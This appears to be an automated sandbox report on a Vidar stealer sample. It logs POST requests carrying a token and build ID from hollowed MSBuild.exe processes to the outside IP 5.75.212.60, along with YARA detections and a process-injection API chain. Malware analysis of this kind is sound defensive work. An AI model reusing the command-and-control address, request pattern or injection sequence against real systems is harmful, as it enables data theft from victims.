2024-07-26 01:18:22 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:22 UTC | 331 | OUT | Data Ascii: ------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------DHJJEGHIIDAFIDHJDHJECont
2024-07-26 01:18:22 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 01:18:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49757 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:23 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 457
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:23 UTC | 457 | OUT | Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------DAECFIJDAAAKECBFCGHICont
2024-07-26 01:18:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 01:18:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 01:18:24 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49758 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:25 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 98617
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:25 UTC | 16355 | OUT | Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------HIIIEGDBKJKEBGCBAFCFCont
2024-07-26 01:18:26 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:26 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
2024-07-26 01:18:26 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49759 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:27 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:27 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------GHJKECAAAFHJECAAAEBFCont
2024-07-26 01:18:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:27 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
2024-07-26 01:18:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49760 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:28 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------EHJKJDGCGDAKFHIDBGCBCont
2024-07-26 01:18:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:29 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
2024-07-26 01:18:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0



                                                                                      Target ID:0
                                                                                      Start time:21:17:49
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                      Imagebase:0x20000
                                                                                      File size:6'581'760 bytes
                                                                                      MD5 hash:4EA39E58D5185EA13C816062F97E001D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:21:17:50
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0x5c0000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:21:17:50
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0x220000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:21:17:50
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0xf0000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:21:17:50
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0xfb0000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:21:18:28
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2812
                                                                                      Imagebase:0x610000
                                                                                      File size:483'680 bytes
                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:9.5%
                                                                                        Dynamic/Decrypted Code Coverage:90%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:30
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 18685 59bf688 18686 59bf6d1 Wow64SetThreadContext 18685->18686 18688 59bf749 18686->18688 18689 59bd2c8 18690 59bd31c LoadLibraryA 18689->18690 18692 59bd3e3 18690->18692 18693 59bf9e8 18694 59bfa34 WriteProcessMemory 18693->18694 18696 59bfacd 18694->18696 18678 59bf890 18679 59bf8d4 VirtualAllocEx 18678->18679 18681 59bf94c 18679->18681 18682 59be390 18683 59be3d8 VirtualAlloc 18682->18683 18684 59be443 18683->18684 18697 59bf160 18698 59bf1a4 ResumeThread 18697->18698 18700 59bf1f0 18698->18700 18701 5463cd8 18702 5463ce4 18701->18702 18703 5463cef 18702->18703 18706 59b4650 18702->18706 18710 59b1736 18702->18710 18707 59ba968 18706->18707 18714 59bcff0 18707->18714 18711 59b1755 18710->18711 18713 59bcff0 VirtualProtect 18711->18713 18712 59b177f 18712->18712 18713->18712 18715 59bd03d VirtualProtect 18714->18715 18716 59ba985 18715->18716

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 5462582-54625be 2 54625c5-5463704 0->2 3 54625c0 0->3 28 5463706 2->28 29 546370b-5463874 2->29 3->2 28->29 40 546387f-54638bd 29->40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: 81586153585748cc89a8bee2067e2295142b16fcbe4ff447b734911fe33e898e
                                                                                        • Instruction ID: 0c1ce2527a3e3cea82179646890903773c10dfd95f9ae14603b7e0af097d4ba4
                                                                                        • Opcode Fuzzy Hash: 81586153585748cc89a8bee2067e2295142b16fcbe4ff447b734911fe33e898e
                                                                                        • Instruction Fuzzy Hash: D3B291B1D41A298FEB64DF29DD44B9ABBF5FB48301F0181EAE40CA7354EB755A858F00

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: 2bdc67c2c0a726d22a7e7808b067cb5295e3b4eec191f9f5106777ce47f3a8a0
                                                                                        • Instruction ID: cdbd28d060bd72da7a2e54cc3410c11eaa028e7f956e75e545085794f325a16d
                                                                                        • Opcode Fuzzy Hash: 2bdc67c2c0a726d22a7e7808b067cb5295e3b4eec191f9f5106777ce47f3a8a0
                                                                                        • Instruction Fuzzy Hash: 60B291B1D41A298FEB64DF29DD44B9ABBF5FB48301F0181EAE40CA7354EB755A858F00

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: d44ca31e4a88698a8a5470b3534f56ab967e60cd44b93713463bc8b7721124f5
                                                                                        • Instruction ID: 5dd0468d711e0c8a1eb0e56b02ad641c0aa3200b413417c523c588ae634399c2
                                                                                        • Opcode Fuzzy Hash: d44ca31e4a88698a8a5470b3534f56ab967e60cd44b93713463bc8b7721124f5
                                                                                        • Instruction Fuzzy Hash: BAA29FB0D056298FDB64DF29DE8479ABBF2FB48305F1181EAD40CAB354EB755A858F00

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Te^q$Te^q$Xz^q$Xz^q$i
                                                                                        • API String ID: 0-2391991066
                                                                                        • Opcode ID: 28c684592c0b4b3a91ea6ce345469ca892ff6d86ab2e27a4cd7aa8cb4cc86b8b
                                                                                        • Instruction ID: 1bda8b28ef30c5274d89710c37a497457326fd87828ec115a1e3a2bb8eb682cd
                                                                                        • Opcode Fuzzy Hash: 28c684592c0b4b3a91ea6ce345469ca892ff6d86ab2e27a4cd7aa8cb4cc86b8b
                                                                                        • Instruction Fuzzy Hash: 3822A274E052298FEB64DF25DD84AD9BBB2FB48301F0085E9D40DA7260DB75AE91CF40

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: H$Te^q$Xz^q$Xz^q
                                                                                        • API String ID: 0-359572378
                                                                                        • Opcode ID: 5ab6c1cc570fe9c1d05ecda8238f08353420817226e8fee48707431bcf831f24
                                                                                        • Instruction ID: 2b29f68bd83f6457fbdc403d871cc3e8039ecd355745d599a43d10f0552d7486
                                                                                        • Opcode Fuzzy Hash: 5ab6c1cc570fe9c1d05ecda8238f08353420817226e8fee48707431bcf831f24
                                                                                        • Instruction Fuzzy Hash: 7412A078E052298FDB64DF25DD84AD9BBB2FB88301F1085E9D40DA7260DB75AE91CF40

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Te^q$Xz^q$Xz^q
                                                                                        • API String ID: 0-2008720192
                                                                                        • Opcode ID: c40261d1f1bad0a742a798b3709954ccfab0fd79cb2941e9691ae4a70a732f2c
                                                                                        • Instruction ID: fa151dabd1fc7e43e90e6faee40a5b42757106ca6b09f470d5a3fe15d54400dd
                                                                                        • Opcode Fuzzy Hash: c40261d1f1bad0a742a798b3709954ccfab0fd79cb2941e9691ae4a70a732f2c
                                                                                        • Instruction Fuzzy Hash: B0128274E052298FDB64DF25DD84AD9BBB2FB88301F1081EAD40DA7264DB75AE91CF40

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D
                                                                                        • API String ID: 0-2746444292
                                                                                        • Opcode ID: 535b674b2f89f022fee49cf9467df3352e90965503ba8c9a9f55366ff97c1e57
                                                                                        • Instruction ID: a5ed169f65bc8644c7f4e7d9b4a383fbe87c007f1f0fdd4c74af10954b23f820
                                                                                        • Opcode Fuzzy Hash: 535b674b2f89f022fee49cf9467df3352e90965503ba8c9a9f55366ff97c1e57
                                                                                        • Instruction Fuzzy Hash: 8A52C774A01228DFCB64DF68D998A9EB7B6FF88300F1045D9D509A7365CB34AE81CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fce4d583e6964cc3a526a03b3c01f2fd746cf970c483feee97081e4b0602c436
                                                                                        • Instruction ID: 23a25e3b87797f5d46aeea5b9c3fc0510d5ffb3478721159aa8026478b667dcc
                                                                                        • Opcode Fuzzy Hash: fce4d583e6964cc3a526a03b3c01f2fd746cf970c483feee97081e4b0602c436
                                                                                        • Instruction Fuzzy Hash: B491AF74E01218CFDB54DFA9D984A9DBBF2FF88300F108569E909AB365DB315986CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 62fcbbdc97ef8d0325ff0f9eb7134608fa3333e74918886d975a9c3cf4f2eaf7
                                                                                        • Instruction ID: 66b51908abcbbf7e37949e5e29662f3c11bfd7176ed1cedec8fa8342f91de92c
                                                                                        • Opcode Fuzzy Hash: 62fcbbdc97ef8d0325ff0f9eb7134608fa3333e74918886d975a9c3cf4f2eaf7
                                                                                        • Instruction Fuzzy Hash: 2881BF74E00218CFDB14DFA9D984A9DBBF2FF88300F108569E909AB365DB31A985CF40

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                        • API String ID: 0-3486158592
                                                                                        • Opcode ID: 84bf9088b86f5a3318b9e4de373e023a978a9537b7e573d02aff78b44beaf372
                                                                                        • Instruction ID: 32f23bb93d8afc0a40c46e76e56d41692bfb2fa77e97420fc23fe99345adbaf6
                                                                                        • Opcode Fuzzy Hash: 84bf9088b86f5a3318b9e4de373e023a978a9537b7e573d02aff78b44beaf372
                                                                                        • Instruction Fuzzy Hash: 0CC16931A002189FDB54DF69D958AAF7BF6FF98301F14846AE806A73A4DB34DC41CB91

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$,$O$W$c
                                                                                        • API String ID: 0-600630442
                                                                                        • Opcode ID: 85fd1fab2af6d5cde0e3f0ce8cd71d4e2397af8a91733d52beee60567a4f6e85
                                                                                        • Instruction ID: 572b03fa86a5fe4fbf181407d8c89bd67fd3df9a0b106f82c83c2ed607ad8458
                                                                                        • Opcode Fuzzy Hash: 85fd1fab2af6d5cde0e3f0ce8cd71d4e2397af8a91733d52beee60567a4f6e85
                                                                                        • Instruction Fuzzy Hash: A3C18F74E052288FDBA4DF24CD54BD9BBB2FF88300F1091EA950DA7250DB796E948F81

Control-flow Graph (legend: Executed / Not Executed)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9$R$_
                                                                                        • API String ID: 0-541541022
                                                                                        • Opcode ID: dd3dc1f164980dd362c5ae96b5a16a82473497c41d34e4a628163362a236940a
                                                                                        • Instruction ID: e5c6b5506920cba04a53b81efaec367f9c72c8b2a8a903d688cc9ddc51c8958e
                                                                                        • Opcode Fuzzy Hash: dd3dc1f164980dd362c5ae96b5a16a82473497c41d34e4a628163362a236940a
                                                                                        • Instruction Fuzzy Hash: 70C1CD74D016288FDB64EF24CC40BAABBB2BF88301F1091EAD54DA7250DB365E95CF80

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hbq$d8cq
                                                                                        • API String ID: 0-70480990
                                                                                        • Opcode ID: 100ada13bcc2f61bd9f95bd0d30077a42e85f6dbd1755b04b6604a4d7fe43a72
                                                                                        • Instruction ID: 3a1cdfe75a914bf4e53ab1eddfc7b589a75b3b195d936601dd884b51b999375c
                                                                                        • Opcode Fuzzy Hash: 100ada13bcc2f61bd9f95bd0d30077a42e85f6dbd1755b04b6604a4d7fe43a72
                                                                                        • Instruction Fuzzy Hash: 6F129538248315CFDB06FB74EA98B763B67FB84700F104928E4455B7ACEB35A885DB61

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,$\
                                                                                        • API String ID: 0-1562614511
                                                                                        • Opcode ID: 3413c8094e7f99509e446b7412833f332a54d229bf1d71e95bb1e75993972e60
                                                                                        • Instruction ID: 9198a9b93ba54d9fe3e781cc669aa78a18141afabb471e543dfe7dca30fc4db4
